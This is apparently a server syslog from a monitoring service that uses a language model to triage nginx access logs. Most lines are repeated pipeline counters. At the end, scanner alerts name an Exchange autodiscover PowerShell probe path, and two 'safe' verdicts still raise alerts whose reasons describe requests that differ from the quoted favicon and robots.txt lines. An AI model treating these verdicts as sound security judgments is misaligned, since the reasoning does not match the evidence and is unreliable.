Mar 20 09:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:31.934393 [observer] Pipeline: processed=4013 pattern_hits=3933 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:31.934417 [observer] Patterns: hash=3933 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:01.943790 [observer] Pipeline: processed=4016 pattern_hits=3936 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:01.943821 [observer] Patterns: hash=3936 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:31.950603 [observer] Pipeline: processed=4018 pattern_hits=3938 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:31.950631 [observer] Patterns: hash=3938 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:01.947284 [observer] Pipeline: processed=4022 pattern_hits=3942 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:01.947464 [observer] Patterns: hash=3942 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:31.944696 [observer] Pipeline: processed=4024 pattern_hits=3944 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:31.944724 [observer] Patterns: hash=3944 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:01.938740 [observer] Pipeline: processed=4030 pattern_hits=3950 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:01.938770 [observer] Patterns: hash=3950 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:31.934197 [observer] Pipeline: processed=4032 pattern_hits=3952 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:31.934221 [observer] Patterns: hash=3952 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:01.948834 [observer] Pipeline: processed=4035 pattern_hits=3955 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:01.948961 [observer] Patterns: hash=3955 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 09:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:31.934051 [observer] Pipeline: processed=4038 pattern_hits=3958 llm_calls=80 llm_errors=1 learned=0
Mar 20 09:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:31.934082 [observer] Patterns: hash=3958 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:01.949138 [observer] Pipeline: processed=4040 pattern_hits=3960 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:01.949181 [observer] Patterns: hash=3960 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:31.937779 [observer] Pipeline: processed=4044 pattern_hits=3964 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:31.937804 [observer] Patterns: hash=3964 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:01.939482 [observer] Pipeline: processed=4046 pattern_hits=3966 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:01.939522 [observer] Patterns: hash=3966 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:31.934022 [observer] Pipeline: processed=4050 pattern_hits=3970 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:31.934047 [observer] Patterns: hash=3970 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:01.994311 [observer] Pipeline: processed=4052 pattern_hits=3972 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:01.994339 [observer] Patterns: hash=3972 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:31.935755 [observer] Pipeline: processed=4055 pattern_hits=3975 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:31.935781 [observer] Patterns: hash=3975 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:01.945350 [observer] Pipeline: processed=4060 pattern_hits=3980 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:01.945375 [observer] Patterns: hash=3980 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:31.949049 [observer] Pipeline: processed=4062 pattern_hits=3982 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:31.949077 [observer] Patterns: hash=3982 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:01.944973 [observer] Pipeline: processed=4066 pattern_hits=3986 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:01.945016 [observer] Patterns: hash=3986 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:31.934003 [observer] Pipeline: processed=4068 pattern_hits=3988 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:31.934029 [observer] Patterns: hash=3988 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:01.948735 [observer] Pipeline: processed=4072 pattern_hits=3992 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:01.948760 [observer] Patterns: hash=3992 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:31.936626 [observer] Pipeline: processed=4074 pattern_hits=3994 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:31.936653 [observer] Patterns: hash=3994 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:01.942985 [observer] Pipeline: processed=4077 pattern_hits=3997 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:01.943024 [observer] Patterns: hash=3997 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:31.940502 [observer] Pipeline: processed=4080 pattern_hits=4000 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:31.940524 [observer] Patterns: hash=4000 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:01.953651 [observer] Pipeline: processed=4082 pattern_hits=4002 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:01.953711 [observer] Patterns: hash=4002 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:31.934487 [observer] Pipeline: processed=4086 pattern_hits=4006 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:31.934512 [observer] Patterns: hash=4006 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:02.039946 [observer] Pipeline: processed=4090 pattern_hits=4010 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:02.039986 [observer] Patterns: hash=4010 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:31.935511 [observer] Pipeline: processed=4094 pattern_hits=4014 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:31.935542 [observer] Patterns: hash=4014 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:01.940779 [observer] Pipeline: processed=4096 pattern_hits=4016 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:01.940811 [observer] Patterns: hash=4016 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:31.935694 [observer] Pipeline: processed=4099 pattern_hits=4019 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:31.935721 [observer] Patterns: hash=4019 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:01.952517 [observer] Pipeline: processed=4102 pattern_hits=4022 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:01.952553 [observer] Patterns: hash=4022 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:31.950660 [observer] Pipeline: processed=4104 pattern_hits=4024 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:31.950684 [observer] Patterns: hash=4024 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:01.937693 [observer] Pipeline: processed=4108 pattern_hits=4028 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:01.937719 [observer] Patterns: hash=4028 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:31.940735 [observer] Pipeline: processed=4110 pattern_hits=4030 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:31.940763 [observer] Patterns: hash=4030 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:01.959928 [observer] Pipeline: processed=4114 pattern_hits=4034 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:01.959957 [observer] Patterns: hash=4034 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:31.939459 [observer] Pipeline: processed=4116 pattern_hits=4036 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:31.939484 [observer] Patterns: hash=4036 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:01.983745 [observer] Pipeline: processed=4121 pattern_hits=4041 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:01.983779 [observer] Patterns: hash=4041 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:31.935331 [observer] Pipeline: processed=4124 pattern_hits=4044 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:31.935361 [observer] Patterns: hash=4044 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:01.965622 [observer] Pipeline: processed=4126 pattern_hits=4046 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:01.966772 [observer] Patterns: hash=4046 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:31.936203 [observer] Pipeline: processed=4130 pattern_hits=4050 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:31.936228 [observer] Patterns: hash=4050 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:01.945999 [observer] Pipeline: processed=4132 pattern_hits=4052 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:01.946025 [observer] Patterns: hash=4052 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:31.934202 [observer] Pipeline: processed=4136 pattern_hits=4056 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:31.934226 [observer] Patterns: hash=4056 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:01.944737 [observer] Pipeline: processed=4138 pattern_hits=4058 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:01.944768 [observer] Patterns: hash=4058 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:31.949470 [observer] Pipeline: processed=4140 pattern_hits=4060 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:31.949496 [observer] Patterns: hash=4060 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:01.941898 [observer] Pipeline: processed=4144 pattern_hits=4064 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:01.941929 [observer] Patterns: hash=4064 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:31.934350 [observer] Pipeline: processed=4146 pattern_hits=4066 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:31.934377 [observer] Patterns: hash=4066 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:02.124236 [observer] Pipeline: processed=4150 pattern_hits=4070 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:02.124297 [observer] Patterns: hash=4070 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:31.944769 [observer] Pipeline: processed=4154 pattern_hits=4074 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:31.944801 [observer] Patterns: hash=4074 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:01.948063 [observer] Pipeline: processed=4158 pattern_hits=4078 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:01.948230 [observer] Patterns: hash=4078 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:31.942432 [observer] Pipeline: processed=4160 pattern_hits=4080 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:31.942464 [observer] Patterns: hash=4080 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:01.960518 [observer] Pipeline: processed=4162 pattern_hits=4082 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:01.960638 [observer] Patterns: hash=4082 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:31.940585 [observer] Pipeline: processed=4166 pattern_hits=4086 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:31.940609 [observer] Patterns: hash=4086 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:01.966669 [observer] Pipeline: processed=4168 pattern_hits=4088 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:01.966802 [observer] Patterns: hash=4088 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:31.934959 [observer] Pipeline: processed=4172 pattern_hits=4092 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:31.934986 [observer] Patterns: hash=4092 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:01.957028 [observer] Pipeline: processed=4174 pattern_hits=4094 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:01.957073 [observer] Patterns: hash=4094 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:31.933969 [observer] Pipeline: processed=4178 pattern_hits=4098 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:31.933995 [observer] Patterns: hash=4098 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:01.945022 [observer] Pipeline: processed=4180 pattern_hits=4100 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:01.945060 [observer] Patterns: hash=4100 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:31.952557 [observer] Pipeline: processed=4184 pattern_hits=4104 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:31.952586 [observer] Patterns: hash=4104 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:01.939902 [observer] Pipeline: processed=4188 pattern_hits=4108 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:01.942543 [observer] Patterns: hash=4108 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:31.949957 [observer] Pipeline: processed=4190 pattern_hits=4110 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:31.949981 [observer] Patterns: hash=4110 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:01.943302 [observer] Pipeline: processed=4194 pattern_hits=4114 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:01.943341 [observer] Patterns: hash=4114 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:31.933966 [observer] Pipeline: processed=4196 pattern_hits=4116 llm_calls=80 llm_errors=1 learned=0
Mar 20 10:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:31.934009 [observer] Patterns: hash=4116 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80
Mar 20 10:25:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:44.747740 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 10:25:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:44.747778 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 10:25:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:44.747888 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T10:25:38.358031219Z 168.76.20.229 - - [20/Mar/2026:10:25:38 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, li...
Mar 20 10:25:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:49.173381 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 10:25:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:49.173424 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 10:25:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:49.173473 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T10:25:38.799377483Z 168.76.20.229 - - [20/Mar/2026:10:25:38 +0000] "54.200.221.0" "GET /robots.txt HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 10:26:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:02.031115 [observer] Pipeline: processed=4206 pattern_hits=4124 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:26:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:02.031477 [observer] Patterns: hash=4124 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:31.940652 [observer] Pipeline: processed=4208 pattern_hits=4126 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:31.940675 [observer] Patterns: hash=4126 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:01.946484 [observer] Pipeline: processed=4210 pattern_hits=4128 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:01.946508 [observer] Patterns: hash=4128 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:31.935407 [observer] Pipeline: processed=4214 pattern_hits=4132 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:31.935434 [observer] Patterns: hash=4132 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:28:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:02.098641 [observer] Pipeline: processed=4216 pattern_hits=4134 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:28:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:02.098674 [observer] Patterns: hash=4134 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:31.935231 [observer] Pipeline: processed=4222 pattern_hits=4140 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:31.935262 [observer] Patterns: hash=4140 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:01.960813 [observer] Pipeline: processed=4224 pattern_hits=4142 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:01.960956 [observer] Patterns: hash=4142 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:31.933995 [observer] Pipeline: processed=4228 pattern_hits=4146 llm_calls=82 llm_errors=1 learned=0
Mar 20 10:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:31.934019 [observer] Patterns: hash=4146 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82
Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.606841 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.606886 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access from an external IP with a CensysInspect user agent hitting the root path and issuing a redirect could indicate automated scanning or probing activity. Line=2026-03-20T10:29:36.746235581Z 66.132.172.142 - - [20/Mar/2026:10:29:36 +0000] "login.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.cens...
